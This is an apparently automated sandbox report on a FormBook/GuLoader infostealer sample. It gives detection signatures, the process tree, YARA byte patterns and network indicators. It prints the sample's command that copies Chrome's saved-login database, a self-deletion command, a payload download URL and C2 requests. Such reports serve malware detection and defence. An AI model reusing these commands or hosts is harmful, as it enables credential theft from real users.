
Analysis Report IMAGE-M265NV_20200329_180550_0001 from google.com

Overview

General Information

Sample Name: IMAGE-M265NV_20200329_180550_0001 from google.com (renamed file extension from com to exe)
MD5: 32ab992ed2a6e72e72558654f48ff32d
SHA1: 091f2c9629786090af31d832bb182d7dd5a2793c
SHA256: dc7e1a440e96897e4b84965c3922b82c475d6150aaafbc7b78dbac987a6de0a6

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netsh to modify the Windows network and firewall settings
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • IMAGE-M265NV_20200329_180550_0001 from google.exe (PID: 3728 cmdline: 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe' MD5: 32AB992ED2A6E72E72558654F48FF32D)
    • IMAGE-M265NV_20200329_180550_0001 from google.exe (PID: 5024 cmdline: 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe' MD5: 32AB992ED2A6E72E72558654F48FF32D)
      • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
        • netsh.exe (PID: 460 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 3456 cmdline: /c del 'C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 4484 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • vp2d3tbpivbxnjq8.exe (PID: 4668 cmdline: 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe' MD5: 32AB992ED2A6E72E72558654F48FF32D)
        • vp2d3tbpivbxnjq8.exe (PID: 2408 cmdline: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe MD5: 32AB992ED2A6E72E72558654F48FF32D)
        • vp2d3tbpivbxnjq8.exe (PID: 4920 cmdline: 'C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe' MD5: 32AB992ED2A6E72E72558654F48FF32D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp
  • Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  • Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group | Strings:
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
  • Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com | Strings:
    • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x157a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15291:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x158a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x15a1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa69a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1450c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb393:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp
  • Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  • Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group | Strings:
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C

      Sigma Overview


System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\netsh.exe, ParentImage: C:\Windows\SysWOW64\netsh.exe, ParentProcessId: 460, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 4484

      Signature Overview


AV Detection:

Multi AV Scanner detection for domain / URL
Source: pashupatiexports.com | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\L5jwtnd\vp2d3tbpivbxnjq8.exe | Virustotal: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\L5jwtnd\vp2d3tbpivbxnjq8.exe | Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\L5jwtnd\vp2d3tbpivbxnjq8.exe | ReversingLabs: Detection: 48%
Multi AV Scanner detection for submitted file
Source: IMAGE-M265NV_20200329_180550_0001 from google.exe | Virustotal: Detection: 44%
Source: IMAGE-M265NV_20200329_180550_0001 from google.exe | Metadefender: Detection: 29%
Source: IMAGE-M265NV_20200329_180550_0001 from google.exe | ReversingLabs: Detection: 48%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 4x nop then mov eax, 00000539h | 0_2_029F254A
Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exe | Code function: 4x nop then mov eax, 00000539h | 1_2_0056254A
Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exe | Code function: 4x nop then mov eax, 00000539h | 14_2_0209254A

Source: global traffic | HTTP traffic detected: GET /h2s/?L48Hat=JZppaGuo8tb/Wg9K8KFoiK07esopG7Fv+ZRkorRAZiFZKSPuahWSLcFfANW1R99W0phJ&KN98bL=_v2HRVCXLJ90 HTTP/1.1 | Host: www.hookbug.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /h2s/?L48Hat=bMh33HuRgKDpY/y5BaHo7Jgx7M+JN321x5doFz59jAJwuNYRwM6nR/ehq53kINTgdUX/&KN98bL=_v2HRVCXLJ90 HTTP/1.1 | Host: www.criptohouse.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 184.168.221.42
Source: Joe Sandbox View | ASN Name: unknown
Source: global traffic | HTTP traffic detected: GET /bin_hzgJnJgi173.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: pashupatiexports.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /h2s/ HTTP/1.1 | Host: www.criptohouse.com | Connection: close | Content-Length: 183440 | Cache-Control: no-cache | Origin: http://www.criptohouse.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.criptohouse.com/h2s/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: (hex dump of the POST body omitted)
Source: global traffic | HTTP traffic detected: GET /bin_hzgJnJgi173.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: pashupatiexports.com | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /h2s/?L48Hat=JZppaGuo8tb/Wg9K8KFoiK07esopG7Fv+ZRkorRAZiFZKSPuahWSLcFfANW1R99W0phJ&KN98bL=_v2HRVCXLJ90 HTTP/1.1 | Host: www.hookbug.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /h2s/?L48Hat=bMh33HuRgKDpY/y5BaHo7Jgx7M+JN321x5doFz59jAJwuNYRwM6nR/ehq53kINTgdUX/&KN98bL=_v2HRVCXLJ90 HTTP/1.1 | Host: www.criptohouse.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: pashupatiexports.com
Source: unknown | HTTP traffic detected: POST /h2s/ HTTP/1.1 | Host: www.criptohouse.com | Connection: close | Content-Length: 183440 | Cache-Control: no-cache | Origin: http://www.criptohouse.com | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: http://www.criptohouse.com/h2s/ | Accept-Language: en-US | Accept-Encoding: gzip, deflate | Data Raw: (hex dump of the POST body omitted)
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jun 2020 10:39:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915779211.0000000000A20000.00000004.00000020.sdmpString found in binary or memory: http://pashupatiexports.com/S
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915394791.0000000000560000.00000040.00000001.sdmp, IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915779211.0000000000A20000.00000004.00000020.sdmpString found in binary or memory: http://pashupatiexports.com/bin_hzgJnJgi173.bin
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915779211.0000000000A20000.00000004.00000020.sdmpString found in binary or memory: http://pashupatiexports.com/bin_hzgJnJgi173.binP=
      Source: IMAGE-M265NV_20200329_180550_0001 from google.exe, 00000001.00000002.915779211.0000000000A20000.00000004.00000020.sdmpString found in binary or memory: http://pashupatiexports.com/bin_hzgJnJgi173.binS
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000003.00000000.890811257.0000000007B92000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000003.00000000.892678491.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

      Source: vp2d3tbpivbxnjq8.exe, 0000000D.00000002.1474270295.0000000000780000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      Yara detected FormBook
      Source: Yara matchFile source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      Detected FormBook malware
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\083NCCSS\083logri.ini
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\083NCCSS\083logrf.ini
      Source: C:\Windows\SysWOW64\netsh.exeDropped file: C:\Users\user\AppData\Roaming\083NCCSS\083logrv.ini
      Malicious sample detected (through community Yara rule)
      Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.918234975.000000001F060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.915230701.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Initial sample is a PE file and has a suspicious name
      Source: initial sampleStatic PE information: Filename: IMAGE-M265NV_20200329_180550_0001 from google.exe
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F29D5 NtProtectVirtualMemory,0_2_029F29D5
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2DC3 NtResumeThread,0_2_029F2DC3
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F0F4F NtWriteVirtualMemory,0_2_029F0F4F
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F10DC NtWriteVirtualMemory,0_2_029F10DC
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2DC9 NtResumeThread,0_2_029F2DC9
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F01C1 NtSetInformationThread,TerminateProcess,0_2_029F01C1
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA720 NtResumeThread,LdrInitializeThunk,1_2_1F2FA720
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA700 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1F2FA700
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA750 NtCreateFile,LdrInitializeThunk,1_2_1F2FA750
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA610 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1F2FA610
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA6A0 NtCreateSection,LdrInitializeThunk,1_2_1F2FA6A0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA560 NtQuerySystemInformation,LdrInitializeThunk,1_2_1F2FA560
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA540 NtDelayExecution,LdrInitializeThunk,1_2_1F2FA540
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA5F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1F2FA5F0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA410 NtQueryInformationToken,LdrInitializeThunk,1_2_1F2FA410
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA4A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1F2FA4A0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA480 NtMapViewOfSection,LdrInitializeThunk,1_2_1F2FA480
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA360 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1F2FA360
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA3E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1F2FA3E0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA240 NtReadFile,LdrInitializeThunk,1_2_1F2FA240
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA2D0 NtClose,LdrInitializeThunk,1_2_1F2FA2D0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA710 NtQuerySection,1_2_1F2FA710
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA780 NtOpenDirectoryObject,1_2_1F2FA780
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA650 NtQueueApcThread,1_2_1F2FA650
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA6D0 NtCreateProcessEx,1_2_1F2FA6D0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA520 NtEnumerateKey,1_2_1F2FA520
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FBD40 NtSuspendThread,1_2_1F2FBD40
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA5A0 NtWriteVirtualMemory,1_2_1F2FA5A0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA430 NtQueryVirtualMemory,1_2_1F2FA430
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FB410 NtOpenProcessToken,1_2_1F2FB410
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA460 NtOpenProcess,1_2_1F2FA460
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FB470 NtOpenThread,1_2_1F2FB470
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA470 NtSetInformationFile,1_2_1F2FA470
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FACE0 NtCreateMutant,1_2_1F2FACE0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA310 NtEnumerateValueKey,1_2_1F2FA310
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA370 NtQueryInformationProcess,1_2_1F2FA370
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA350 NtQueryValueKey,1_2_1F2FA350
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA3D0 NtCreateKey,1_2_1F2FA3D0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA220 NtWaitForSingleObject,1_2_1F2FA220
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FBA30 NtSetContextThread,1_2_1F2FBA30
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA260 NtWriteFile,1_2_1F2FA260
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA2F0 NtQueryInformationFile,1_2_1F2FA2F0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FA800 NtSetValueKey,1_2_1F2FA800
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2FB0B0 NtGetContextThread,1_2_1F2FB0B0
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005629D5 NtProtectVirtualMemory,1_2_005629D5
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562DC3 NtSetInformationThread,1_2_00562DC3
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_005601C1 NtSetInformationThread,1_2_005601C1
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_00562DC9 NtSetInformationThread,1_2_00562DC9
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_020929D5 NtProtectVirtualMemory,14_2_020929D5
      Source: C:\Program Files (x86)\L5jwtnd\vp2d3tbpivbxnjq8.exeCode function: 14_2_020901C1 NtSetInformationThread,14_2_020901C1
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401D510_2_00401D51
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_004015140_2_00401514
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E5A0_2_00401E5A
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E5D0_2_00401E5D
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E750_2_00401E75
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E030_2_00401E03
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E1B0_2_00401E1B
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E210_2_00401E21
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E260_2_00401E26
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401E2F0_2_00401E2F
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401DEF0_2_00401DEF
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_00401DF80_2_00401DF8
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F2F1C0_2_029F2F1C
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F21070_2_029F2107
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 0_2_029F25010_2_029F2501
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3817461_2_1F381746
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3727821_2_1F372782
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D57901_2_1F2D5790
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F381FCE1_2_1F381FCE
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E66111_2_1F2E6611
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E4E611_2_1F2E4E61
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F37CE661_2_1F37CE66
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2E5E701_2_1F2E5E70
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D76401_2_1F2D7640
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F373E961_2_1F373E96
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F3826F81_2_1F3826F8
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F35C53F1_2_1F35C53F
      Source: C:\Users\user\Desktop\IMAGE-M265NV_20200329_180550_0001 from google.exeCode function: 1_2_1F2D15301_2_1F2D1530
